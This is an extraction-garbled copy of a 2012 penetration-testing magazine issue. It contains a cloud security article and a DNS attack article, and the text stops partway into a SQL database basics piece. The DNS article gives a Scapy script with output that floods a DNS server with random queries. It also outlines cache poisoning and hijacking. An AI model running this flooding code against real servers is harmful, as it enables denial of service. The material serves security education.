46#4$3#&/08 /&95446&065400/ · web app bypassing web antiviruses by eugene dokukin...

��

/ ��/ ��/ ��/ ��/ ��/ ��/ ��/ ��/ ��

Visit digitalforensicsmagazine.com��

��

NEXT ISSUE OUT SOON

��

SUBSCRIBE NOW

��

��/ ��

��/ ��

��/ ��

DFM_flyer_2012.indd 1 03/05/2012 12:37

http://www.digitalforensicsmagazine.com/

http://www.myappsecurity.com/

http://pentestmag.com05/2012(7) Page 5 http://pentestmag.com05/2012(7)

CLOUD SOLUTIONSA walk in the clouds: Securing your Cloud Experienceby Ian Moyse

The benefits of cloud computing are resounding, but businesses are still wary of the security implications. How are you assured that your data is as safe on the cloud as it is in your own network? What are the security pros and cons of utilising the cloud? And what steps should you be making to ensure your cloud experiences are not only beneficial to your users, but are secure for your business.

FOCUSHow to Successfully Attack DNS?by Aleksandar Bratic

DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. It can also enlist TCP on the same port for zone transfer of full name record databases. It is estimated that 20% of total Internet traffic amount is DNS traffic.

BASICSWeb Application Vulnerability: MySQL Attack on Website Databaseby Mr. Ooppss

MySQL Attacks are an often used technique to attack databases through a website. This is done by

06

EDITOR’S NOTE

12

Hello Everyone!Spring has finally come and let’s hope that the warming will also concern the science world. I don’t know if you have heard, but the library of Harvard University, the wealthiest university in the world can’t afford to buy all desirable publication. What will be its impact on global society? We don’t know. But we do know that Harvard library is spending on this publications unimaginable $3.75M per year. Its council claims that prestigious magazines suppliers are slowing down the speed of global economy growth by winding prices of the newspapers, which they call ‘products’.

Let’s hope it will be the beginning of judging book by its content and not cover. In this case, Pentest Magazine will be blooming, as there are tons of information useful to everyone who just wants make some effort and reach for them.

We open this month edition with article on Securing Cloud by Ian Moyse, sales director at www.workbooks.com. He writes about threats that appear during cloud computing and he proves positively that you can utilize Cloud, private and public, securely. It creates new security challenges but is still worth using. If we put advantages and disadvantages of that to reasonable mathematical equation, the first will often outnumber the last. Research shows that most common apprehensions are data security and privacy. So how should we secure our data? After reading the Walk in the Clouds you will have better understanding of how to prevent cloud leeks.

Next article is devoted to attacking DNS, which may be neuralgic point since many administrators do not secure it properly. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable. Aleksander Bratic describes in detail techniques of request flooding, response flooding, recursive request flooding, exploiting the DNS trust model (domain Hijacking), cache poisoning and DNS hijacking.

We sacrifice some space to well-known MySQL attacks. It is so popular that we encourage you to check if you are following countermeasures we recommend. Check if you can make safer what you consider safe now. Firewall and well-thought data storage might help the website. The article may be a brief review to experienced users and brilliant lesson for the beginners.

In the Close Up section we take a closer look at web antiviruses. This is a disclosure on how to successfully trick the web AV by the technique of cloaking, which has been around since the 90s. So maybe it’s time to take care of it. You cannot rely only on your AV. The article is very short but it makes it even more convincing and valid since it is enough space to present the issue of cloaking.

And for everyone who wants to relax and have a bit of high-quality fun this summer (no matter how it sounds) we strongly recommend Cyber Styletto chapter 6 as the action enters the higher-level there.

Enjoy reading!Wojciech Chrapka

& PenTest Team

18

http://pentestmag.com05/2012(7) http://pentestmag.com05/2012(7)

TEAMEditor: Wojciech [email protected]

Betatesters: Ankit Prateek, Robert Keeler, Aidan Carty, Kyle Kennedy, Daniel Wood, Johan Snyman

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa [email protected]

Art Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Production Director: Andrzej Kuca [email protected]

Marketing Director: Ewa [email protected]

Publisher: Software Press Sp. z o.o. SK02-682 Warszawa, ul. Bokserska 1Phone: 1 917 338 3631www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.To create graphs and diagrams we used program by

Mathematical formulas created by Design Science MathType™

DISCLAIMER!The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database.

WEB APPBypassing web antiviruses by Eugene Dokukin aka MustLive Eugin Dokukin, pentester with 17 years experience, is

testing systems for searching of viruses at web sites. He made a short brief on how easy it is to develop effective cloaking method by integrating three elements: User-Agent, IP and DNS.

CLOSE-UPConferences in 2012by PenTest Team

Programmer is a constantly undereducated person. Being up to date with the latest trends and solutions often decides if you are seen as a top-shelf coder. We are presenting conferences where all the new trends are mixed and exchanged between groups and individuals in vivid and revitalizing atmosphere. And where you can shine with your knowledge.

CYBER STYLETTOCyber crime novella- Cyber Styletto – Chapter 6

by Mike Brennan and Richard StiennonCyber crime novella- Cyber Styletto – Chapter 6

CONTENTS

24

22

EDITOR’S NOTE

30

CLOUD SOLUTIONS


Security is one of the most important factors for companies who want to store data and operate using the cloud and it continues to

be highlighted as the greatest concern in end user studies. Implementing and utilizing a cloud solution brings great potential benefits, but also introduces challenges around securing content and access control. The cloud offers the promise of large potential savings in infrastructure costs and improved business agility, but concerns about security are a major barrier to implementing cloud initiatives for many organizations. Before transitioning to the cloud, you need to figure out how to implement and enforce an effective security program.

Cloud security refers to the computer, network and information security of cloud computing providers and incorporates data protection, infrastructure and governance issues. Security concerns surrounding cloud computing are generally considered to be security and privacy (of the information stored), compliance (with legislation and user company policy) and legal/contractual issues. In end user survey, after survey, the top 2 issues that surface to the top are security (data being the typical lead in this) and reliability

(being availability and accessibility). A good reference point for this being the Cloud Industry Forums 2011 Cloud Adoption and Trends Survey where 64% cited Security as their most significant cloud concern.

Another study, carried out by network performance monitoring company Network Instruments, added confirmation that the top cloud challenge is the security of corporate data, with 45% of respondents surveyed reporting it as their key concern.

As with other major technology transitions, cloud computing has gained widespread attention and scrutiny in the media. We have seen stories abound around cloud, SaaS (Software as a Service), PaaS (Platform as a Service), etc, both in the consumer (eg. iCloud) and business worlds. Many of the stories have scare mongered, seeing cloud as a pure risk and citing exposures such as Sony and Blackberry as examples of security and reliability in the cloud, of which you could hardly fail to notice. Sony is a good case in point, where the press reported in April 2011 “Two of Sony’s online gaming services, were hacked, compromising confidential data of more than 100 million customers.” under banner headings of being a cloud failure! This

A walk in the Clouds Securing your Cloud Experience

The benefits of cloud computing are resounding, but businesses are still wary of the security implications. How are you assured that your data is as safe on the cloud as it is in your own network? What are the security pros and cons of utilising the cloud? And what steps should you be making to ensure your cloud experiences are not only beneficial to your users, but are secure for your business.

What you will learnIn this article you will learn about the security areas to consider when adopting cloud solutions and some of the questions to ensure you ask.

What you should knowThis article is aimed at those with a fundamental understanding of cloud and security concepts, but is written to be informative for anyone in an IT or business role who is concerned or has read about cloud security issues.

CLOUD SOLUTIONS

Page 6 http://pentestmag.com05/2012(7) http://pentestmag.com05/2012(7)

$20 a share. However today only a year on how many of the 24 million affected Sony users have deserted the provider, relatively few, but in the scheme of things there was moral outrage, but consumer apathy bore out and the news has passed!

As an increasing number of legacy IT Vendors move to offer cloud computing as part of their portfolio, they have played down the concerns around security. However, even with industry heavyweights now committing heavily to the cloud, customers are far from blindly trusting the cloud model.

While IT teams may embrace cloud services as a way to achieve cost savings and increased business flexibility, these technologies are introducing new components and environments which change the security challenge once more. Security challenges in the cloud should be familiar to any IT manager – loss of data, threats to the infrastructure, and compliance risks, with focus varying depending on the size of organisation you represent. Cloud security is a complex topic with many considerations ranging from protection of hardware and platform technologies in the data centre through to regulatory compliance and defending cloud access through different end-point devices.

Whether you are implementing a private or public cloud or a hybrid model that includes both, security must be a strong component of your solution.

could be better named as an internet issue. Sony wasn’t delivering a service hosting on behalf of customers, more delivering a service accesed over the ‘cloud’ such as Instant Messenger, Amazon or any other online seller or provider of wares. The core issue was that they held customers identities and payment details! This breach could have rung true if hacked for any online E-tailor such as Ebay, Paypal, Amazon or others you may use and yourself trust. The “Cloud’s” generic branding is utilised quickly in such instances, as a useful hyped term and one that covers anything internet based. It is a wide sweeping brush that Sony became the poster child for.

The Sony leak was followed on with a report later by an independent security expert that found 67% of the users whose passwords were published on the Sony leak, were still using the same password that was leaked a year prior in the Gawker 2010 breach. Meaning users who knew their password had been leaked previously and knew they used the same password on Sony Online had not believed a need or taken the action to change it! Users responsibility for their part in security remains an issue whether on network or in the cloud of course!

Sony of course started paying a its toll however with a flow of share price drops in the weeks following the issue going public, taking it from above $30 down to

Figure 1. Concerns about adoption of cloud

CLOUD SOLUTIONS


IT Security in itself, bar cloud, already beholds a great deal of responsibility. It must protect corporate assets from an ever increasing volume and sophistication of attacks, ensure any regulatory compliance is met, monitor and protect the business against internal threats and keep information from leaking through an ever increasing number of mediums including email, the web and social networks. Over the past decade the IT security market has expanded rapidly as vendor solutions to thwart all the attack types have come into being and IT security has become more complex with a need not only to understand basic point solutions, but to correlate together a range of vendor offerings in a coherent manner and ensure they are also configured and updated accurately. Attackers have become more adept at penetrating systems, often still using the user as the weak link, and whereas they used to only care about high-profile or larger targets, they are also now setting their sights on smaller companies to achieve their goals.

To this end existing on-site security solutions and infrastructure may not be sufficient or cost effective to protect against the dynamic growing and changing attack landscape. This is not a reason alone to consider a move to the cloud, but cloud security approaches are now recognised as highly effective (in reducing cost and complexity) defence mechanisms, when approached diligently.

A 2012 survey commissioned by Microsoft indicated for example that SMBs are gaining significant IT security advantages from cloud computing, with 35% surveyed experiencing “noticeably higher” levels of security since moving to the cloud and 32% spending less time each week managing security than companies not using the cloud. Security, rather than acting as a barrier to cloud adoption in smaller businesses, is in fact one of the key benefits that they can experience by moving to the cloud.

The economies of scale and flexibility the cloud brings can be a friend and a foe from a security aspect. The concentration of data presents an attractive target to attackers, but cloud defences can be more robust, scalable and cost-effective than a self-build and manage approach! You must face the reality though that many employees will be using cloud services regardless if this is offered up by the business and IT as official policy.

How does security differ with private vs. public clouds? Businesses directly control the security of private clouds whereas with a public cloud rely on the standardised delivery and security of the cloud provider. Doing it yourself can give you control but it also gives you the responsiblity and overheads

of delivery, updating, configuring and responding to threats. With a public cloud and carefully chosen vendor the security of the cloud component is done for you, typically with you retaining control over access management and policies through your management portal. There are pro’s and cons of each aproach and do not assume vendors are all equal, doing diligence and asking pertinent questions is key. Also understand that utiliskng a public cloud vendor does not mitigate your security responsibilities as there remains a need to secure your endpoints,user access and user security.

Private cloud security has similarities to that of security in the traditional datacentre. Worries remain around network security, authentication, auditing and identity management. However you are no longer are in complete control of the workloads, or even of the operating systems that are running in your datacenter. With private cloud, the consumers of your services can spin up new operating systems and create new applications depending on the service model you make available to your users. Therefore you need to address new areas such as the following:

• Deciding who has the rights access and consume your cloud services?

• Do you have controls for the behaviors of the services and operating systems that your private cloud customers will be able to run up?

• Are you able to identity self service users that may represent potential threats, such as anyone using stolen credentials?

• Do you have mechanisms to ensure that users cannot migrate their user role into an administration role?

• Do you have a way to automate security responses to incidents, such as possible denial of service situations?

Public cloud is going to require that you do your diligence on the cloud provider. For example asking where they host, who with, where your data is located, who has access to it, what security policies do they operate, what access do you have to apply your own security policies (access control for example). Is your data striped across multi-location datacentre’s? Do they apply data mingling where your data is in the same host and database as other customers’ or are you allocated a separate and discrete data store in the service?

Very few, if any, companies will move completely to the cloud in the short term, there are too many legacy systems to maintain that are cloud unfriendly.

http://www.thevarguy.com/2012/05/18/cloud-computing-boosts-security-productivity-for-smbs/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheVarGuy+%28The+VAR+Guy%29&elq=8905940b1e0c4d6c8026c52dfc5e3b66&elqCampaignId=78

http://www.microsoft.com/

http://www.thevarguy.com/2012/05/17/smb-security-software-well-hello-there-sophos/

http://www.thevarguy.com/2012/05/17/smb-security-software-well-hello-there-sophos/

http://www.thevarguy.com/2012/05/18/cloud-computing-boosts-security-productivity-for-smbs/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheVarGuy+%28The+VAR+Guy%29&elq=8905940b1e0c4d6c8026c52dfc5e3b66&elqCampaignId=78

CLOUD SOLUTIONS


Regulation will also play a part in areas which delay or restrict cloud being a viable solution (for now).

Cloud brings great advantage to mobile users and with estimates from Gartner that by 2014 around 80% of professionals will use at least two personal devices to access corporate systems and data, the two are likely to become more entwined. The growth of mobile access and BYOD (Bring Your Own Device) cultures is moving the security perimeter out past the organisations infrastructure to bold new areas. The cloud has delivered an expectation of applications that are free from the constraints of legacy desktop tied clients and that can be accessed anywhere from pretty much any device. Cloud combined with mobile/BYOD can deliver major benefits to productivity and flexibility of an organisations workforce, but introduces a new range of security concerns. IDC recently stated “Mobility will present the greatest security challenge in the next five years.”

Security experts have highlighted how BYOD can put an organization’s network at risk because workers could inadvertently transfer a virus-infected file into the network or gain access and ownership over restricted organisational data by downloading it on to a non-work owned and secured device. With Cloud of course the user is increasingly likely to want to use a mobile device and with a mobile device the user is likely to demand more access to cloud like applications. The fact is that Perimeterless Security is harder.

Off the back of cloud and mobile devices comes authentication. How does a user authenticate securely to the cloud service (private or public)? Do they login via a browser on the mobile device or have a mobile client that pre-authenticates that device? If a client login how will the user remember an ever increasing number of passwords? (which in most user domains is already an issue despite the promises of Single Sign On and Directory Systems). Also cloud services like web sites tend to use different user ID and password formats, some being email address, some first name surname and some employee number and with varying password lengths and rules around characters to be utilised. All of this is a security aspect that needs to be considered. How will you secure users outside your directory and with systems accessible from any device? With cloud applications the user credentials become even more valuable as the login is often no longer tied to a VPN connection or device, so ensuring that the user (person) side of password protection doesn’t slip up is essential in the cloud world, as if it wasn’t already! (sic).

Data governance and security has headline visibility whenever cloud is mentioned and is a top concern for adoption. Under new guidance from the National Institute of Standards and Technology, users and not providers have ultimate responsibility for the security and privacy of data stored on the public cloud. Guidance co-author and NIST Computer Scientist Tim Grance commented “accountability for security and privacy in public cloud deployments cannot be delegated to a cloud provider and remains an obligation for the organization to fulfil.” This is a good thing and to be expected. Utilising cloud does not and should not totally devolve you of security responsibility for your users behaviour.

In pursuing public cloud services, the guidelines recommend that organisations:

• Carefully plan the security and privacy aspects of cloud computing solutions before implementing them.

• Understand the public cloud computing environment offered by the cloud provider.

• Ensure that a cloud computing solution of cloud resources and cloud applications satisfies organisational security and privacy requirements.

• Maintain accountability over the privacy and security of data and applications implemented and deployed in public cloud computing environments.

A simple question that often gets asked of a cloud vendor “is where is your datacentre located?”.

Figure 2. Which of these was the primary reason for adopting cloud-based services?

CLOUD SOLUTIONS

http://pentestmag.com05/2012(7)

Advised questions would also include “and is that where my data will be held?” and “Where is your backup data center?”. Further questions have arisen from recent reports highlighting that simply looking to keep data in the EU is not enough for European firms. In June 2011, the managing director of Microsoft UK admitted that it would comply with the Patriot Act as its headquarters are based in the US and that it would try to inform its customers of any data request as it happened, but that it would not guarantee this! Meaning that if you do business with a UK subsidiary of a US-based cloud operator, you can choose to specify that English law applies and ensure they offer you a EU based data center operating under EU data protection laws, but your data is till open to US access if your vendor is US owned. If this is of concern, you need to ensure that your provider is European owned and legislated. Of course this would limit you from many mainstream providers such as Amazon, Google and Microsoft so there are always balances and measures to apply in your decisions.

Gartner believes all cloud customers should have some basic rights to protect their interests and defined six of these as being:

• The right to retain ownership, use and control one’s own data,

• The right to SLAs that address liabilities, remediation and business outcomes,

• The right to notification and choice about changes that affect the service consumer’s business processes,

• The right to understand the technical limitations or requirements of the service up front,

• The right to know what security processes the provider follows,

• The responsibility to understand and adhere to software license requirements.

In addition to security approaches, more education is also needed in cloud across all sectors to enable businesses to understand and utilize this important new technology option to its advantage in a secure manner and this need for understanding stretches past simply the border of the IT department. CompTIA’s Cloud Essentials certification is an example option that enables employees of varying roles to validate their cloud knowledge, take online training and exam condition testing. Expect to see more cloud courses and exams providing the market with the required validations in this new cloudy world. Lack of knowledge breeds concern and risk. If you are in IT or a position

of influencing your strategy, start educating now on the various forms of cloud and how to secure them in you environment. Resistance and ignorance will deliver only a short term strategy to cloud in the ever competitive business world.

Can you utilise Cloud, private and public securely? Yes. Does it pose new security challenges? Another Yes. Do Cloud Security questions give you a reason to ignore cloud and maintain the status quo of on network deployments? In places of course you will decide that a specific application or requirement is best served on network, but it is not an encompassing no for sure! Cloud offers a lot of benefits, varying by organisation and application and the security aspects can be overcome as others have been in the past. Educate, learn, adapt and adopt, as cloud is here to stay in its varying form factors, there are too many success stories and businesses doing well utilizing cloud for security to be a pure play excuse any longer.

Worth seeingThose wishing to learn more and participate in the cloud can also find some great vendor independent resources such as:

• http://www.cloudindustryforum.org/• https://cloudsecurityalliance.org/• http://www.eurocloud.org/ u

IAN MOYSEIan Moyse has over 25 years of experience in the IT Sector, with nine of these specialising in security For the last 8 years he has been focused in Cloud Computing and has become a thought leader in this arena. He now holds the role of Sales Director at Cloud CRM provider Workbooks.com. He also sits on

the board of Eurocloud UK and the Governance Board of the Cloud Industry Forum (CIF) and in early 2012 was appointed to the advisory board of SaaSMax. He was named by TalkinCloud as one of the global top 200 cloud channel experts in 2011 and in early 2012 Ian was the �rst in the UK to pass the CompTIA Cloud Essentials specialty certi�cation exam.Sales Director www.workbooks.com, Eurocloud UK Board Member & Cloud Industry Forum Governance Board Member.

http://certification.comptia.org/getCertified/certifications/cloud.aspx

http://certification.comptia.org/getCertified/certifications/cloud.aspx

http://www.cloudindustryforum.org/

https://cloudsecurityalliance.org/

http://www.eurocloud.org/

http://Workbooks.com

http://www.workbooks.com

A Network breach...Could cost your Job!

� � ��

� � ��

� � ��

� � ��

��

��

� � ��

IS Y

OUR

NETW

ORK

SECU

RE?

��

��

Global I.T. Security Training & Consulting

��

��

��

��

INFORMATION ASSURANCESERVICES

mile2 Boot Camps

www.mile2.com��

��

Available Training Formats

Other New Courses!!��

��

(ISC)2 & CISSP are service marks of the IISSCC. Inc. Security+ is a trade mark of CompTIA. ITIL is a trade mark of OGC.GSLC & GCIH are trademarks of GIAC.

11928 Sheldon Rd Tampa, FL 33626

http://www.mile2.com

FOCUS


DNS was proposed by Paul Mockapetris in 1983 (in RFC’s 882 and 883), as a distributed and dynamic database – as opposed to the single

table on a single host that was used by the earlier version of the internet, ARPAnet. Together with Jon Postel, he is considered the inventor of DNS.

Structure of a DNS packetID – A 16 bit identifier assigned by the program that generates any kind of query. This identifier is copied to the corresponding reply and can be used by the requester to match up replies to outstanding queries.

QR – A one bit field that specifies whether this message is a query (0), or a response (1).

OPCODE – A four bit field that specifies kind of query in this message.

AA Authoritative Answer – this bit is only meaningful in responses, and specifies that the responding name server is an authority for the domain name in question. This bit is used to report whether or not the response you receive is authoritative.

TC TrunCation – specifies that this message was truncated.

RD Recursion Desired – this bit directs the name server to pursue the query recursively. Use 1 to demand recursion.

RA Recursion Available – this be is set or cleared in a response, and denotes whether recursive query support is available in the name server. Recursive query support is optional.

Z – Reserved for future use.RCODE Response code – this 4 bit field is set as part of

responses. The values have the following interpretation:

0 – No error condition1 – Format error – The name server was unable to

interpret the query.2 – Server failure – The name server was unable to

process this query due to a problem with the name server.

How to Successfully Attack DNS?DNS is a very attractive to attack as very often IT administrators forget to implement measures to secure DNS service. DNS listens on port 53 where UDP is used to resolves domain names to IP addresses and vice versa. It can also enlist TCP on the same port for zone transfer of full name record databases. It is estimated that 20% of total Internet traffic amount is DNS traffic.

Figure 1. Domain name system

FOCUS


Listing 1. Output

Welcome to Scapy (2.2.0)

>>>top_level = ".rs"

>>>domain = "example"

>>>cnt = 1000

>>>dns_server = "10.123.11.2"

>>>

>>>for i in range(0, cnt):

... s = RandString(RandNum(1,8))

... s1 =s.lower()

... q = s1+"."+domain+top_level

... print i ,q

... sr1(IP(dst=dns_server)/UDP(sport=RandShort())/DNS(

rd=1,qd=DNSQR(qname=q)))

...

0 2dat.example.rs

Begin emission:

.Finished to send 1 packets.

..*

Received 4 packets, got 1 answers, remaining 0 packets

<IP version=4L ihl=5L tos=0x0 len=114 id=27935 flags=DF

frag=0L ttl=126 proto=udpchksum=0x59ed src=10.123.11.2

dst=10.123.21.119 options=[] |<UDP sport=domain

dport=10385 len=94 chksum=0x21ac |<DNS id=0 qr=1L

opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=n

ame-error qdcount=1 ancount=0 nscount=1 arcount=0

qd=<DNSQR qname='2dat.example.rs.' qtype=A qclass=IN

|> an=None ns=<DNSRR rrname='rs.' type=SOA rclass=IN

ttl=900 rdata='\x01a\x03nic\xc0\x19\nhostmaster\xc0/

w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\x00$\xea\x00\x00\

x00*0' |>ar=None |>>>

1 e0qysndm.example.rs

Begin emission:

Finished to send 1 packets.

*


<IP version=4L ihl=5L tos=0x0 len=118 id=27937 flags=DF

frag=0L ttl=126 proto=udpchksum=0x59e7 src=10.123.11.2

dst=10.123.21.119 options=[] |<UDP sport=domain

dport=42090 len=98 chksum=0xecab |<DNS id=0 qr=1L

opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=

name-error qdcount=1 ancount=0 nscount=1 arcount=0

qd=<DNSQR qname='e0qysndm.example.rs.' qtype=A

qclass=IN |> an=None ns=<DNSRR rrname='rs.' type=SOA

rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x1d\

nhostmaster\xc03w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\

x00$\xea\x00\x00\x00*0' |>ar=None |>>>

2 ponlj.example.rs

Begin emission:

.Finished to send 1 packets.

*


<IP version=4L ihl=5L tos=0x0 len=115 id=27939

flags=DF frag=0L ttl=126 proto=udpchksum=0x59e8

src=10.123.11.2 dst=10.123.21.119 options=[]

|<UDP sport=domain dport=3015 len=95 chksum=0x21d4

|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L

z=0L rcode=name-error qdcount=1 ancount=0 nscount=1

arcount=0 qd=<DNSQR qname='ponlj.example.rs.' qtype=A


rclass=IN ttl=900

3 xx.example.rs

Begin emission:


*


<IP version=4L ihl=5L tos=0x0 len=112 id=27941

flags=DF frag=0L ttl=126 proto=udpchksum=0x59e9

src=10.123.11.2 dst=10.123.21.119 options=[]

|<UDP sport=domain dport=56637 len=92 chksum=0xd320

|<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L

z=0L rcode=name-error qdcount=1 ancount=0 nscount=1

arcount=0 qd=<DNSQR qname='xx.example.rs.' qtype=A


rclass=IN ttl=900 rdata='\x01a\x03nic\xc0\x17\

nhostmaster\xc0-w\xedO\x8e\x00\x00*0\x00\x00\x0e\x10\

x00$\xea\x00\x00\x00*0' |>ar=None |>>>

4 6348lzwk.example.rs

Begin emission:


FOCUS


3 – Name Error – Meaningful only for responses from an authoritative name server, this code signifies that the domain name referenced in the query does not exist.

4 – Not Implemented – The name server does not support this requested kind of query.

5 – Refused – The name server refuses to perform the specified operation for policy reasons.

QDCOUNT – an unsigned 16 bit integer specifying the number of entries in the question section. Set this field to 1, indicating one question.

ANCOUNT – an unsigned 16 bit integer specifying the number of resource records in the answer section.

Set this field to 0, indicating that not providing any answers.

NSCOUNT – an unsigned 16 bit integer specifying the number of name server resource records in the authority records section.

ARCOUNT – an unsigned 16 bit integer specifying the number of resource records in the additional records section.

DNS Request FloodingAs I mentioned above DNS use UDP queries for name resolution. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable. A DNS flood works by sending large number of rapid DNS requests, flooding the server with an amount of traffic that it can’t handle so that the performance of the server drops for legitimate requests.

Scapy is a a packet manipulation program that can forge requests and send them to a specified host. Below I show how it can be used in a DNS flooding attack (Listing 1 abd Listing 2).

DNS Response FloodingIn this attach a client or name server, floods a name server with requests for records for which the server is authoritative, using a spoofed source IP address. This results in the flooding of the target network – the network associated with the spoofed IP address – with DNS responses to requests never issued from that network (Figure 2).

Listing 2. Tcpdump output

tcpdump: listening on eth0, link-type EN10MB

(Ethernet), capture size 65535 bytes

15:33:50.292083 IP (tos 0x0, ttl 64, id 1, offset

0, flags [none], proto UDP (17), length 61)

ws003.local.10385 >dns.company.com.domain: [udp sum

ok] 0+ A? 2dat.example.rs. (33)


0, flags [DF], proto UDP (17), length 70)


ok] 10990+ PTR? 2.11.123.10.in-addr.arpa. (42)



dns.company.com.domain> ws003.local.37817: [udp sum

ok] 10990* q: PTR? 2.11.123.10.in-addr.arpa. 1/0/

0 2.11.123.10.in-addr.arpa.PTR dns.company.com. (74)




ok] 35417+ PTR? 119.21.123.10.in-addr.arpa. (44)



dns.company.com.domain> ws003.local.54183: [udp

sum ok] 35417 NXDomain* q: PTR? 119.21.123.10.in-

addr.arpa. 0/1/0 ns: 21.123.10.in-addr.arpa. SOA

dns.company.com. hostmaster.alcoyu.co.yu. 3325 900 600

86400 3600 (131)




sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0

ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102

10800 3600 2419200 10800 (86)

15:33:50.296217 IP (tos 0xc0, ttl 64, id 17068, offset

0, flags [none], proto ICMP (1), length 142)

ws003.local >dns.company.com: ICMP ws003.local udp

port 10385 unreachable, length 122

IP (tos 0x0, ttl 126, id 27935, offset 0, flags

[DF], proto UDP (17), length 114)


sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0


10800 3600 2419200 10800 (86)


0, flags [none], proto UDP (17), length 65)


ok] 0+ A? e0qysndm.example.rs. (37)



dns.company.com.domain> ws003.local.42090: [udp sum

ok] 0 NXDomain q: A? e0qysndm.example.rs. 0/1/0


10800 3600 2419200 10800 (90)

FOCUS


Recursive Request FloodingThis attack consists of an attacker flooding a target name server with DNS requests, for records for which server is not authoritative. This action has two effects,

one is flooding the target name sever with recursive DNS requests and the other is to attack responsible authoritative name server with DNS request flood.

Exploiting the DNS Trust Model – Domain Hijacking This form of attack could also be called DNS Registration Attacks. To take ownership of domain it is necessary to register at the appropriate Internet registrar, provide the domain contact information, and ensure that the Generic Top Level Domain servers (GTLDs) are updated with the appropriate name server information. It is possible to fake the DNS registration or to change registration details. If the attack is successful and DNS registration records are updated, the attacker can make a “rouge” DNS server and direct clients to fake web sites and mail servers. This attack is preferable for “phishers” because the user is unaware of the fraud.

DNS registration bodies involved several protection controls to avoid DNS domain hijacking to authenticate registration requests.

• Comparison of e-mail addresses in the mail header and Mail-From field in mail is one example.

• Encrypted contact supplied password in database for authentication of registration requests is another.

• The use of PGP keys for signing registration modification requests.

Cache PoisoningVery often DNS server are configured to search for records in their cache as primary sources and then to search zone file data. From an attacker’s perspective it is easier to compromise cache on a name server than to manipulate zones.

A cache poisoning attack can be combined with DNS spoofing attack. By spoofing a counterfeit response to a DNS query, an attacker can remotely update server cache data. When high value of TTL (Time To Live) is returned by an attacker along with spoofed record data, the response data will be cached by the local name server for considerable period of time. This will have

Figure 2. DNS Response �ooding

Figure 3. DNS Cache poisoning

FOCUS


an impact on all clients in same network. Goal of cache poisoning attack is to feed the name server with false address (A) or name server (NS) records with high TTL value, to affect client and server redirection or Internet denial-of-service.

What makes DNS cache poisoning a difficult (or easy) exploit is the use of a 16-bit Transaction ID, an integer that is sent with every DNS query. This integer is supposed to be randomly generated.

In diagram below attacker will try poison cache of Company DNS server for domain answer.com and place in its cache the fake IP address.

In first step of the attack, the attacker contacts the company’s DNS server to check for the domain name for answer.com with the command:

root@bt#dig answer.com @comapnie.com

In the case that there wasn’t a recent request for answer.com at the company’s DNS server, it will make DNS query to root the name server to lookup IP address for answer.com. This query contains the random Transaction ID integer. At the same time, the attacker starts an attack which floods the company’s DNS server with manually crafted packets, that look like the DNS reply expected but it contains the

wrong IP address. Each replay will have a different transaction ID integer, the attacker expects that one of these fake replies will match the transaction ID in query sent by company’s DNS.

It is important that the replies by the attacker reaches the company’s DNS server before the legitimate replies. If the transactional ID integers used by companies DNS are predictable, the attacker have better a chance to fake the demanded IP address. The company’s DNS will use the first reply which appears legitimate by checking transactional ID integer.

What can make this attack even more efficient is to start DDoS to authoritative DNS server for www.answer.com, this will increase the chance that an attacker will predict transactional ID integer (Figure 3).

DNS HijackingIn this kind of attack the attacker tries to “hijack” part of the DNS name space by compromising an upstream server or by submitting a fake name server registration change to the Internet register.

This type of attack has a key benefit in that it does not require the direct compromise of any servers on the target organization’s network. If the attacker’s intention, for example, is to deface the corporate Web page for the victimco.com domain, the attacker can effectively achieve this by leveraging a DNS hijacking attack to redirect Internet Web clients to a new site containing a revised set of Web content (Figure 4).

An attacker can compromise a server which contain the records for answer.com or submit fake request for change on Internet register and become able to change records for answer.com.

After this step attacker can hijack domain answer.com and redirect addressed to legitimate answer.com to fake servers which can run different services (mail, http, https).u

Figure 4. DNS Hijacking

ALEKSANDAR BRATICCISO at respectable �nancial institution in Serbia, focused on pen testing techniques and methodology, vulnerability assessment, incident handling process and risk mitigation.

http://answer.com

http://answer.com

contact:[email protected]

smart security interface©

the multiplatform security connector integrated with all major PKI applications and TMS platforms; it fully supports all wide spread smart cards and architectures for government, corporate and bank projects; it also interfaces with smart phones, pre-boot systems and TPM

iEnigma®

the software application that turns your smart phone into a PKI smart card; unparalleled convenience for digital identity management; unbeatable security thanks to the support of NFC chips and micro SD cards

plug´n´crypt®

the product line for logical and physical access control covering different form factors: USB token, smart card, micro SD card, soft token, also in combination ��

CSTC®

PKI made simple and accessible to SMB: card initialization, management of ��TMS infrastructure

www.charismathics.com

http://www.charismathics.com

BASICS


SQL stands for Structured Query Language. SQL is used to communicate with a database. It is the standard language for relational database

management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, etc. Most database systems use SQL, most of them also have their own additional proprietary extensions that

are usually only used on their system. The standard SQL commands such as Select, Insert, Update, Delete, Create, and Drop can be used to accomplish almost everything that one needs to do with a database.

What are tables?Within a SQL database there are tables which store information. Tables can store any information on a website, ranging from usernames, passwords, and addresses, to text displayed on a web page, such as a

